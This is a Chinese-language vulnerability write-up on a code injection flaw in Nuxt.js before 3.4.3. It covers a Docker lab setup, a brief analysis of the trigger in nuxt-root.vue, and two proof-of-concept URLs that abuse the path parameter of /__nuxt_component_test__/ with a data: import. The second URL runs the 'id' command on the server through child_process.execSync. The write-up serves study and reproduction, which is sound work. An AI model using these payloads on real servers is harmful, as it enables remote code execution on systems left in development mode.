漏洞简介

Nuxt 是一个免费的开源框架，它以一种直观的、可扩展的方式，用Vue.js创建类型安全、性能良好和生产级的全栈Web应用程序和网站。Nuxt.js(简称 Nuxt)是一个基于 Vue.js 的通用应用框架，用于构建服务端渲染的应用程序（SSR）和静态生成的网站。

Nuxt.js 3.4.3之前版本中的 test-component-wrapper 组件的动态导入函数存在代码注入漏洞，当服务器在开发模式下运行且Node.js的版本为 12+ 时，攻击者可以利用 EMCAScript 的 'data: import' 功能导入恶意载荷，进而远程执行恶意代码。

环境搭建

不断尝试出错，最后成功编写了 docker 文件

FROM node:18

# 设置工作目录
WORKDIR /app

COPY package.json ./
RUN npm init -y 
RUN npm install -g npm
RUN npm install
RUN npm install -g nuxt@3.4.0

# 暴露 Nuxt.js 默认端口（3000）
EXPOSE 3000

# 启动开发者模式
CMD ["npx", "nuxi", "dev"]

version: '3'
services:
  app:
    build:
      context: .
      dockerfile: Dockerfile
    ports:
      - 3000:3000

{
  "name": "my-nuxt-project",
  "version": "1.0.0",
  "private": true,
  "scripts": {
    "dev": "nuxt"
  },
  "dependencies": {
    "nuxt": "3.4.0"
  }
}

‍

漏洞复现

http://localhost:3000/__nuxt_component_test__/?path=data%3atext/javascript,console.log(%22test!%22);

‍

http://localhost:3000/__nuxt_component_test__/?path=data%3atext/javascript,throw%20new%20Error((await%20import(%27child_process%27)).execSync(%27id%27));

‍

漏洞浅析

‍

漏洞的触发点在 packages/nuxt/src/app/components/nuxt-root.vue​ 当服务器以 dev 模式运行，请求的 url 以 /__nuxt_component_test__/​ 开头时，会引入 #build/test-component-wrapper.mjs​，会根据 query 中的 path 截取然后引入，导致任意代码执行。